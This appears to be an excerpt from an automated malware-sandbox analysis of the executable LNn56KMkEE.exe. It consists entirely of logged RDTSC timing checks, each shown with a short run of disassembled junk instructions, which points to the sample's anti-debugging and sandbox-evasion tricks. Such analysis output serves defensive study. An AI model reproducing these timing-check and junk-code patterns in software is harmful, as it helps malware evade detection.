                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 71FE89 second address: 71FEC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD72h 0x00000007 jmp 00007F2ADCE7BD78h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007F2ADCE7BD66h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 71FEC2 second address: 71FECC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 71FECC second address: 71FEE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2ADCE7BD73h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 720018 second address: 72001C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 720430 second address: 720453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F2ADCE7BD66h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F2ADCE7BD73h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 720453 second address: 72046C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2ADCE78B3Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 72070F second address: 720718 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 720718 second address: 72071E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 72071E second address: 720730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F2ADCE7BD66h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 720730 second address: 72073C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F2ADCE78B36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 720851 second address: 720855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7209BA second address: 7209BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7209BE second address: 7209C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7209C9 second address: 7209CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7209CD second address: 7209D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7209D1 second address: 7209F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F2ADCE78B3Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2ADCE78B3Eh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7209F5 second address: 7209F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 720B96 second address: 720BA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F2ADCE78B36h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 71FAAD second address: 71FAB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 727C5A second address: 727C65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 727C65 second address: 727C7F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jp 00007F2ADCE7BD66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2ADCE7BD6Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 727C7F second address: 727C83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 72A3B3 second address: 72A3D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F2ADCE7BD6Bh 0x0000000a jnc 00007F2ADCE7BD66h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 jg 00007F2ADCE7BD66h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 735022 second address: 735028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 735198 second address: 7351A8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F2ADCE7BD66h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 736C7B second address: 736C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 736C7F second address: 736C99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F2ADCE7BD6Fh 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 73C7BD second address: 73C7C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 73C7C2 second address: 73C7C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 73C7C8 second address: 73C7F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jo 00007F2ADCE78B46h 0x0000000f jmp 00007F2ADCE78B40h 0x00000014 jmp 00007F2ADCE78B3Eh 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 73C3AE second address: 73C3B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 73DE70 second address: 73DE93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F2ADCE78B42h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 73DE93 second address: 73DE9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 753730 second address: 753768 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B43h 0x00000007 jmp 00007F2ADCE78B49h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jo 00007F2ADCE78B3Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 753768 second address: 75376E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 75376E second address: 75377A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F2ADCE78B36h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 75377A second address: 7537C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2ADCE7BD73h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F2ADCE7BD6Eh 0x00000018 pushad 0x00000019 je 00007F2ADCE7BD66h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7537C5 second address: 7537CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7537CB second address: 7537D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7523B7 second address: 7523CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B42h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7523CD second address: 7523EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F2ADCE7BD74h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7523EB second address: 7523F6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7523F6 second address: 75240B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 jnc 00007F2ADCE7BD6Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 75240B second address: 75242E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F2ADCE78B36h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 75242E second address: 752432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 752432 second address: 752436 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 75256D second address: 752571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 752571 second address: 75259A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F2ADCE78B38h 0x0000000c jmp 00007F2ADCE78B48h 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 75259A second address: 7525AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007F2ADCE7BD66h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7525AC second address: 7525B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7525B4 second address: 7525C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 js 00007F2ADCE7BD6Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7526FA second address: 75270C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007F2ADCE78B36h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 75270C second address: 75272B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2ADCE7BD76h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 752878 second address: 75288A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2ADCE78B3Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 75288A second address: 75289F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2ADCE7BD6Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 752A03 second address: 752A0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 752B63 second address: 752B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 75618E second address: 7561B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B3Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F2ADCE78B47h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7561B8 second address: 7561DB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2ADCE7BD66h 0x00000008 jmp 00007F2ADCE7BD6Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007F2ADCE7BD66h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7561DB second address: 756201 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F2ADCE78B43h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 756201 second address: 756207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 76141F second address: 76142D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F2ADCE78B36h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 76142D second address: 76144B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2ADCE7BD6Fh 0x0000000a jns 00007F2ADCE7BD6Eh 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 775DA4 second address: 775DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 775DAA second address: 775DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 775DAE second address: 775DB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 775DB4 second address: 775DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F2ADCE7BD6Ah 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 777E41 second address: 777E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7779C2 second address: 7779C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7779C7 second address: 7779D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F2ADCE78B36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 777B73 second address: 777B7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007F2ADCE7BD66h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 789F94 second address: 789FAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 789FAC second address: 789FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 789FB4 second address: 789FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2ADCE78B3Fh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 78EBA9 second address: 78EBAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 78EBAD second address: 78EBB3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 78EBB3 second address: 78EBB8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 78DF93 second address: 78DFAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 78E68B second address: 78E6B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F2ADCE7BD7Eh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30B90 second address: 4E30B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30B95 second address: 4E30BD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 725Dh 0x00000007 pushfd 0x00000008 jmp 00007F2ADCE78B3Ah 0x0000000d xor esi, 6FCC72B8h 0x00000013 jmp 00007F2ADCE78B3Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c je 00007F2B4DC56331h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F2ADCE78B40h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30BD6 second address: 4E30BDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30BDA second address: 4E30BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30BE0 second address: 4E30BE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30BE6 second address: 4E30BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30BEA second address: 4E30C7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [75C7459Ch], 05h 0x00000012 jmp 00007F2ADCE7BD70h 0x00000017 je 00007F2B4DC715DEh 0x0000001d jmp 00007F2ADCE7BD70h 0x00000022 xchg eax, esi 0x00000023 pushad 0x00000024 push eax 0x00000025 pop eax 0x00000026 mov edx, 7CC2CF1Ch 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F2ADCE7BD6Eh 0x00000035 sub ax, 7C38h 0x0000003a jmp 00007F2ADCE7BD6Bh 0x0000003f popfd 0x00000040 mov ax, 026Fh 0x00000044 popad 0x00000045 mov eax, 6703568Bh 0x0000004a popad 0x0000004b xchg eax, esi 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F2ADCE7BD6Dh 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30C7D second address: 4E30C82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30CDF second address: 4E30CEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2ADCE7BD6Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30CEF second address: 4E30CFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30CFE second address: 4E30D02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 4E30D02 second address: 4E30D06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
